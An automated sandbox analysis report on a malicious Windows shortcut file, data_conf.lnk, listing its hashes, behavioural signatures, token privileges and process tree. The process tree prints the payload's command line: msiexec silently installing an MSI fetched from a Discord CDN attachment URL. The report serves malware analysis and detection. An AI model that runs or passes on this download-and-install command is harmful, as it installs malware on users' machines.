Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
27-08-2023 22:29
Static task
static1
Behavioral task
behavioral1
Sample
data_conf.lnk
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
data_conf.lnk
Resource
win10v2004-20230703-en
Behavioral task
behavioral3
Sample
dependentlibs.list
Resource
win7-20230712-en
Behavioral task
behavioral4
Sample
dependentlibs.list
Resource
win10v2004-20230703-en
General
-
Target
data_conf.lnk
-
Size
1KB
-
MD5
598ea8c6f5035c7f096419da69d7a92e
-
SHA1
1e0c9b378f5f8f80bbd67c6c46acb8a174913768
-
SHA256
fee9c51d03cebc85b04228cb3238fe994436435f20e3628b978fd2ac8d85e03e
-
SHA512
00d868a21f9db1a280c2c8cc3188702bc604cf459ce5218e6be2419b48e48b288e42de3a1ec20bf4895e93fa6cc8d66f6723bee3743cc2977b2a3fdc808d1179
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2772 msiexec.exe 6 2772 msiexec.exe -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 2804 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2804 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 2804 msiexec.exe Token: SeIncreaseQuotaPrivilege 2804 msiexec.exe Token: SeRestorePrivilege 2772 msiexec.exe Token: SeTakeOwnershipPrivilege 2772 msiexec.exe Token: SeSecurityPrivilege 2772 msiexec.exe Token: SeCreateTokenPrivilege 2804 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2804 msiexec.exe Token: SeLockMemoryPrivilege 2804 msiexec.exe Token: SeIncreaseQuotaPrivilege 2804 msiexec.exe Token: SeMachineAccountPrivilege 2804 msiexec.exe Token: SeTcbPrivilege 2804 msiexec.exe Token: SeSecurityPrivilege 2804 msiexec.exe Token: SeTakeOwnershipPrivilege 2804 msiexec.exe Token: SeLoadDriverPrivilege 2804 msiexec.exe Token: SeSystemProfilePrivilege 2804 msiexec.exe Token: SeSystemtimePrivilege 2804 msiexec.exe Token: SeProfSingleProcessPrivilege 2804 msiexec.exe Token: SeIncBasePriorityPrivilege 2804 msiexec.exe Token: SeCreatePagefilePrivilege 2804 msiexec.exe Token: SeCreatePermanentPrivilege 2804 msiexec.exe Token: SeBackupPrivilege 2804 msiexec.exe Token: SeRestorePrivilege 2804 msiexec.exe Token: SeShutdownPrivilege 2804 msiexec.exe Token: SeDebugPrivilege 2804 msiexec.exe Token: SeAuditPrivilege 2804 msiexec.exe Token: SeSystemEnvironmentPrivilege 2804 msiexec.exe Token: SeChangeNotifyPrivilege 2804 msiexec.exe Token: SeRemoteShutdownPrivilege 2804 msiexec.exe Token: SeUndockPrivilege 2804 msiexec.exe Token: SeSyncAgentPrivilege 2804 msiexec.exe Token: SeEnableDelegationPrivilege 2804 msiexec.exe Token: SeManageVolumePrivilege 2804 msiexec.exe Token: SeImpersonatePrivilege 2804 msiexec.exe Token: SeCreateGlobalPrivilege 2804 msiexec.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 1864 wrote to memory of 2804 1864 cmd.exe 29 PID 1864 wrote to memory of 2804 1864 cmd.exe 29 PID 1864 wrote to memory of 2804 1864 cmd.exe 29 PID 1864 wrote to memory of 2804 1864 cmd.exe 29 PID 1864 wrote to memory of 2804 1864 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\data_conf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i https://cdn.discordapp.com/attachments/1139130854761844741/1139155521396559954/aspose.msi /quiet2⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2772